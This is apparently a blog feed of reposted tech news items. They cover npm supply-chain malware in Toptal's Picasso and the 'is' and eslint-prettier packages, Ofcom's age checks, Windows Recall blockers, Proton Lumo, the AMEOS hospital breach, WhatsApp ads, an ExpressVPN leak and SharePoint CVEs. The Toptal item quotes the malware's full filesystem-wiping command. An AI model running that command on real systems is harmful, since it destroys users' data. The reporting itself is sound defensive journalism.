Credit: Socket

Also compromised was an npm package known as 'is.' It receives roughly 2.8 million downloads weekly.

Potential for widespread damage

Supply-chain attacks like the ones Socket has flagged have the potential to cause widespread damage. Many packages available in repositories are dependencies, meaning the dependencies must be incorporated into downstream packages for those packages to work. In many developer flows, new dependency versions are downloaded and incorporated into the downstream packages automatically.

The packages flagged in the three attacks are:

• @toptal/picasso-tailwind
• @toptal/picasso-charts
• @toptal/picasso-shared
• @toptal/picasso-provider
• @toptal/picasso-select
• @toptal/picasso-quote
• @toptal/picasso-forms
• @xene/core
• @toptal/picasso-utils
• @toptal/picasso-typography.
• is version 3.3.1, 5.0.0
• got-fetch version 5.1.11, 5.1.12
• Eslint-config-prettier, versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7
• Eslint-plugin-prettier, versions 4.2.2 and 4.2.3
• Synckit, version 0.11.9
• @pkgr/core, version 0.2.8
• Napi-postinstall, version 0.3.1

Developers who work with any of the packages targeted should ensure none of the malicious versions have been installed or incorporated into their wares. Developers working with open source packages should:

• Monitor repository visibility changes in search of suspicious or unusual publishing of packages
• Review package.json lifecycle scripts before installing dependencies
• Use automated security scanning in continuous integration and continuous delivery pipelines
• Regularly rotate authentication tokens
• Use multifactor authentication to safeguard repository accounts

Additionally, repositories that haven’t yet made MFA mandatory should do so in the near future.

Source

Hope you enjoyed this news post.

Posted Saturday 26 July 2025 at 1:04 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

These age checks are part of the broader Online Safety Act, which is designed to make the internet safer, particularly for kids. These measures move away from just confirming you’re 18 by clicking a button to having to actually verify your age with ID or a face scan, but this move is not without its critics.

Starting today, Ofcom will actively check compliance with the new rules and start launching investigations into non-compliant services, starting next week. The current enforcement program that’s focused on studio porn services is extending to all platforms allowing user-shared pornographic material, not just those websites dedicated to that. Ofcom is also launching another enforcement program that will target websites specifically dedicated to harmful content like self-harm, suicide, eating disorders, and extreme violence/gore.

Ofcom has strong enforcement powers under the Online Safety Act, it can dish out fines of up to 10% of qualifying worldwide revenue or £18 million. For the worst offenders, Ofcom can even get websites blocked in the UK. Ofcom is already investigating 11 companies that it doesn’t think are following the rules.

Aside from age checks, Ofcom’s Codes also require websites to protect children from dangerous stunts, misogynistic, violent, hateful, or abusive material, and online bullying. Algorithms of social media will need to be configured to block harmful content in children’s feeds, for example. Ofcom will be launching an extensive monitoring program requiring risk assessments by August 7 and practical action disclosures by September 30.

While some have criticized the Online Safety Act, research cited by Ofcom shows that 71% of UK parents think the changes will positively impact children’s online safety, with 77% being optimistic about the age checks specifically. With that said, a significant minority of parents (41%) are skeptical about whether tech firms will follow the rules.

Source: Ofcom | Image via Depositphotos.com

Source

Hope you enjoyed this news post.

Posted Saturday 26 July 2025 at 4:31 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

AdGuard for Windows 7.21 introduces a new feature that lets you turn off Windows Recall. Although Recall is a strictly opt-in experience and it has several security measures, AdGuard developers believe that it is not enough. They argue that the feature idea itself is unsettling, PINs are easy to crack, and filters sometimes fail to engage. Here is what AdGuard says in the announcement post:

PINs are easy to crack, and filters may fail to detect sensitive content. Leaving backdoors wide open and hoping everything works as intended — or that Microsoft will always act in good faith — just isn’t a solid privacy strategy.

 

That’s exactly why AdGuard has an entire section of settings dedicated to blocking Windows tracking. And now, it includes one more.

If you use AdGuard on your PC, you can find the new "Disable Windows Recall" feature in Settings > Tracking Protection.

As of now, Recall is only available on Copilot+ PCs. This month's non-security update expanded Recall to more users, making the feature available in the European Economic Area. And with Intel working on the next-generation desktop processors with improved NPUs, you can expect Recall and other recently introduced AI features to make their way to more users with desktop PCs.

Source

Hope you enjoyed this news post.

Posted Saturday 26 July 2025 at 4:28 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

The packages included data-stealing code that collected GitHub authentication tokens and then wiped the victims' systems.

Toptal is a freelance talent marketplace that connects companies with software developers, designers, and finance experts. The company also maintains internal developer tools and design systems, most notably Picasso, which they make available through GitHub and NPM.

Attackers hijacked Toptal's GitHub organization on July 20, and almost immediately made public all 73 of the repositories available, exposing private projects and source code.

In the days that followed, the attackers modified the source code of Picasso on GitHub to include malware and published 10 malicious packages on NPM as Toptal, making them appear as legitimate updates.

The malicious packages and modified versions are:

• @toptal/picasso-tailwind (v3.1.0)
• @toptal/picasso-charts (v59.1.4)
• @toptal/picasso-shared (v15.1.0)
• @toptal/picasso-provider (v5.1.1)
• @toptal/picasso-select (v4.2.2)
• @toptal/picasso-quote (v2.1.7)
• @toptal/picasso-forms (v73.3.2)
• @xene/core (v0.4.1)
• @toptal/picasso-utils (v3.2.0)
• @toptal/picasso-typography (v4.1.4)

The malicious packages were downloaded roughly 5,000 times before being detected, likely infecting developers with malware.

The hackers injected the malicious code into 'package.json' files to add two functions: steal data ('preinstall' script) and wipe hosts ('postinstall' script).

The first extracts the victim's CLI authentication token and sends it to an attacker-controlled webhook URL, granting them unauthorized access to the target's GitHub account.

After exfiltrating the data, the second script attempts to delete the entire filesystem with 'sudo rm -rf --no-preserve-root /' on Linux systems, or recursively and silently delete files on Windows.

According to code security platform Socket, Toptal deprecated the malicious packages on July 23 and reverted to safe versions, but issued no public statement to alert users who had downloaded the malicious releases to the risks.

Although the initial compromise method remains unknown, Socket lists multiple possibilities ranging from insider threats to phishing attacks targeting Toptal developers.

BleepingComputer has contacted Toptal for a statement, but we are still waiting for their response.

If you have installed any of the malicious packages, you are advised to revert to a previous stable version as soon as possible.

Source

Hope you enjoyed this news post.

Posted Friday 25 July 2025 at 2:15 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

Lumo works like ChatGPT, Copilot, or any other chatbot. While it does not offer extensive features and capabilities like voice mode or image generation, it makes up for that with improved privacy, encryption, and open-source LLMs. Lumo does not store logs, and users' chats are encrypted and only available on their devices. Proton promises not to share any user data with third parties, advertisers, or governments, nor to use it to train its models.

Besides regular chats, Lumo supports web search. It is turned off by default for improved privacy, but users can toggle on web search mode and ask Lumo to search using "privacy-friendly" search engines. The assistant can also analyze uploaded files and access documents stored in Proton Drive.

Here is what Andy Yen, Proton's founder and CEO, said about the launch of Lumo:

“Big Tech is using AI to supercharge the collection of sensitive user data to accelerate the world’s transition to surveillance capitalism. For this reason, we believe it is essential to provide an alternative that protects privacy and serves users as opposed to exploiting them. AI should not become the world’s most powerful surveillance tool, and our vision for Lumo is AI that puts people ahead of profits.”

You can use Lumo without a Proton account (Guest mode) with a limited number of questions per week. With a free Proton account, users can ask more questions, access chat history, and upload files. Finally, there is a premium tier, which offers unlimited chats, extended chat history, unlimited chat favorites, and the ability to upload multiple or large files. Lumo Plus costs $12.99 per month or $119.88 per year, and it is included in the Proton Visionary plan.

Lumo is now available on lumo.proton.me. There are also dedicated mobile apps, which you can download from the Apple App Store here and the Google Play Store here.

Source

Hope you enjoyed this news post.

Posted Thursday 24 July 2025 at 4:26 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

This occurred after maintainer accounts were hijacked via phishing, followed by unauthorized owner changes that went unnoticed for several hours, potentially compromising many developers who downloaded the new releases.

The 'is' package is a lightweight JavaScript utility library that provides a wide variety of type checking and value validation functions.

The software has over 2.8 million weekly downloads on the NPM package index. It is used extensively as a low-level utility dependency in development tools, testing libraries, build systems, and backend and CLI projects.

On July 19, 2025, the package's primary maintainer, John Harband, announced that versions 3.3.1 through 5.0.0 contained malware and were removed roughly 6 hours after threat actors submitted them to npm.

This was the result of the same NPM supply chain attack that used the fake domain' npnjs[.]com' to snatch maintainer credentials and then publish laced versions of popular packages.

Besides 'is,' the following packages were confirmed to be pushing malware, compromised in the same attack:

• eslint-config-prettier (8.10.1, 9.1.1, 10.1.6, 10.1.7)
• eslint-plugin-prettier (4.2.2, 4.2.3)
• synckit (0.11.9)
• @pkgr/core (0.2.8)
• napi-postinstall (0.3.1)
• got-fetch (5.1.11, 5.1.12)

Socket reports that 'is' contains a cross-platform JavaScript malware loader that opens a WebSocket-based backdoor, enabling remote code execution.

"Once active, it queries Node's os module to collect the hostname, operating system, and CPU details, and captures all environment variables from process.env," explains Socket.

"It then dynamically imports the ws library to exfiltrate this data over a WebSocket connection."

"Every message received over the socket is treated as executable JavaScript, giving the threat actor an instant, interactive remote shell."

The researchers also analyzed the payload in 'eslint' and the rest of the packages, finding a Windows infostealer called 'Scavanger' which targets sensitive information stored in web browsers.

The malware features evasion mechanisms such as indirect syscalls, encrypted command and control (C2) communications, but it may trigger security warnings in Chrome due to flag manipulation.

Based on the attack pattern, the threat actors may have compromised additional maintainer credentials and are preparing to experiment with stealthier payloads on new software packages.

To prevent this, maintainers should reset their passwords and rotate all tokens immediately, and developers should only use known-to-be-safe versions from before July 18, 2025.

Auto-updating should be turned off, while lockfiles can be used to freeze releases on specific dependency versions.

Source

Hope you enjoyed this news post.

Posted Thursday 24 July 2025 at 4:23 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

Almost immediately, critics and security researchers labeled the feature a privacy nightmare, pointing out that a single piece of malware could gain access to a user's entire digital life. In response to the backlash, Microsoft promised that users will be able to filter which apps get recorded, but some developers are not waiting around.

Just about a month after the feature became generally available for Copilot+ PCs (it is now rolling out to users in Europe), some app developers took matters into their own hands to protect their users.

One such company was Signal, which implemented an opt-out feature called "Screen Security" to prevent its chats from being captured. It cleverly uses a Digital Rights Management (DRM) flag to black out the application window during a screenshot attempt, using the same technology that streaming services like Netflix use to prevent people from recording movies.

Now, Brave Browser has joined the party, announcing on X that it will block Recall by default with its v1.81 update, which is expected in the coming weeks.

While Microsoft stated that Recall would not capture content from private browsing windows, Brave's new update just tells the Windows operating system that all of its browser windows are private. This prevents Recall from snapshotting anything you do in Brave, not just the activity in a designated private tab.

In its announcement, the company did give Microsoft some credit for making changes following the initial public outcry, such as making Recall an opt-in feature. However, the company still feels that giving any application unrestricted access to a user's browsing history is a huge risk.

If you, for some reason, like Windows Recall, you can disable the upcoming protection by navigating to Settings, then Privacy and Security, and toggling off the "Block Microsoft Recall" option.

Source

Hope you enjoyed this news post.

Posted Wednesday 23 July 2025 at 1:00 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

The organization published a statement on its website, as required by Article 34 of the General Data Protection Regulation (GDPR), which mandates a public notice in the event of a data breach.

AMEOS is a Zurich-based healthcare provider that employs 18,000 staff in over 100 hospitals, clinics, rehabilitation centers, and nursing homes located across Switzerland, Germany, and Austria.

It is one of the largest private hospital groups in the broader DACH region, with over 10,000 beds and annual revenue exceeding $1.4 billion.

AMEOS informs that, despite the "extensive security measures" in place, external actors gained unauthorized access to its IT systems and accessed sensitive information.

"Data belonging to patients, employees, and partners—as well as contact information relating to you or your company—may have been affected due to unauthorized access," reads the announcement.

"It cannot be ruled out that this data may be misused on the internet to the detriment of those affected or made accessible to third parties."

In response, AMEOS has shut down all IT systems and terminated all external and internal network connections. Additionally, it reinforced existing measures and contracted external IT and forensic experts to aid with response efforts.

The data protection authorities in the countries have been informed accordingly, and a criminal complaint was filed with the police.

People who have received care at AMEOS facilities are advised to remain vigilant against phishing and scam attempts.

To date, there are no signs that the accessed data has been disseminated online, stated the healthcare provider.

The investigation is still underway, and AMEOS has promised to provide updates as new information becomes available.

"Currently, we have no specific evidence of an actual leak of your individual personal data," states the organization.

"You will be informed immediately upon completion of the ongoing review and investigation measures via this page."

At the time of writing, no major ransomware groups have taken responsibility for the attack at AMEOS. The organization did not specify if the attack involved data encryption, so the type of incident and the perpetrators are unknown.

Source

Hope you enjoyed this news post.

Posted Wednesday 23 July 2025 at 12:57 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

Meanwhile, Promoted Channels will get their own placement in the channel directory to increase visibility for businesses and creators who pay. These will also carry a “sponsored” label. These updates have already been released to some Android beta testers, but not all; it’s the same situation on iOS, you may see these changes, or not.

This is a big change for WhatsApp because it hasn’t shown ads ever since it was acquired by Meta. Ultimately, Meta is an ads company, so it’s not too shocking to see Meta incorporate ads in WhatsApp.

The decision to bring ads to WhatsApp is part of Meta’s broader monetization strategy to provide revenue streams for businesses and creators directly within the app. The company also says that the ads you see are based on limited information like your general region, app language, public channels followed, and engagement with previous ads.

If you connect your WhatsApp account to Meta’s Account Center, then it will also use your ad preference from other Meta apps to be used for targeting, but this is off by default. To give you more control, you can download your Activity Report to see which ads you’ve encountered. You can also block/report advertisers.

With Status Ads, businesses have a new way to reach more users, following a similar format already used in Instagram Stories. With Promoted Channels, content creators and businesses get a direct way to boost their visibility without relying on external platforms. For brands and organizations, these features will be welcomed, by Meta also thanks to additional revenue it will generate. Users on the other hand probably will not be happy to see ads infiltrating yet another app, especially one that claims to put privacy first.

Source and image: WABetaInfo

Source

Hope you enjoyed this news post.

Posted Tuesday 22 July 2025 at 4:42 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

One of the key premises of a VPN is masking a user's IP address, allowing users to stay anonymous online, and in some cases, bypass censorship. Failing to do so is a severe technical failure for a VPN product.

ExpressVPN is a leading VPN service provider, consistently rated among the top VPN services, and used by millions worldwide. It utilizes RAM-only servers that don't retain user data and adheres to an audited no-logs policy.

On April 25, 2025, a security researcher known as "Adam-X" reported a vulnerability through ExpressVPN's bug bounty program that exposed RDP and other TCP traffic transmitted over port 3389.

Upon investigating, the ExpressVPN team found that the issue was caused by remnants of debug code used for internal testing being mistakenly included in production builds, specifically, from 12.97 (released four months ago) to 12.101.0.2-beta.

"If a user established a connection using RDP, that traffic could bypass the VPN tunnel," reported ExpressVPN in an announcement.

"This did not affect encryption, but it meant that traffic from RDP connections wasn't routed through ExpressVPN as expected."

"As a result, an observer, like an ISP or someone on the same network, could have seen not only that the user was connected to ExpressVPN, but also that they were accessing specific remote servers over RDP—information that would normally be protected."

A patch was made available with ExpressVPN version 12.101.0.45, released on June 18, 2025.

The privacy firm notes that the security lapse did not compromise encryption on the tunnels, and the leak scenarios only affect those using Remote Desktop Protocol (RDP), which they consider to be low-risk for their customers.

"As mentioned above, in practice, this issue would most commonly have affected users actively using RDP—a protocol that's generally not used by typical consumers," reads ExpressVPN's advisory.

"Given that ExpressVPN's user base is made up predominantly of individual users rather than enterprise customers, the number of affected users is likely small."

RDP is a Microsoft network protocol that enables users to remotely control Windows systems over a network, used by IT administrators, remote workers, and enterprises.

Still, it is recommended that users upgrade their Windows clients to version 12.101.0.45 for ultimate protection.

ExpressVPN states that it will strengthen its internal build checks to prevent similar bugs from being introduced in production in the future, including enhanced automation in development testing.

Last year, ExpressVPN faced another issue causing DNS request leaks when users enabled the 'slipt tunneling' feature on the Windows client.

The feature was temporarily disabled until a fix was implemented in a future release.

Source

Hope you enjoyed this news post.

Posted Tuesday 22 July 2025 at 4:39 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend  

Microsoft's Defender Vulnerability Management team reiterated that it is aware of the widespread problem and has issued detailed guidance on flaws, their nature, severity and the patch status. This guidance applies to CVE‑2025‑49704, CVE‑2025‑49706, which have already been patched, as well as CVE‑2025‑53770 and CVE‑2025‑53771 which are receiving patches now:

Up next, the company has also published a table simplifying the affected SharePoint Server versions across the four vulnerabilities:

You can find more details here on the official blog post on Microsoft's Tech Community website.

Source

Hope you enjoyed this news post.

Posted Tuesday 22 July 2025 at 4:39 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of June): 2,864

RIP Matrix | Farewell my friend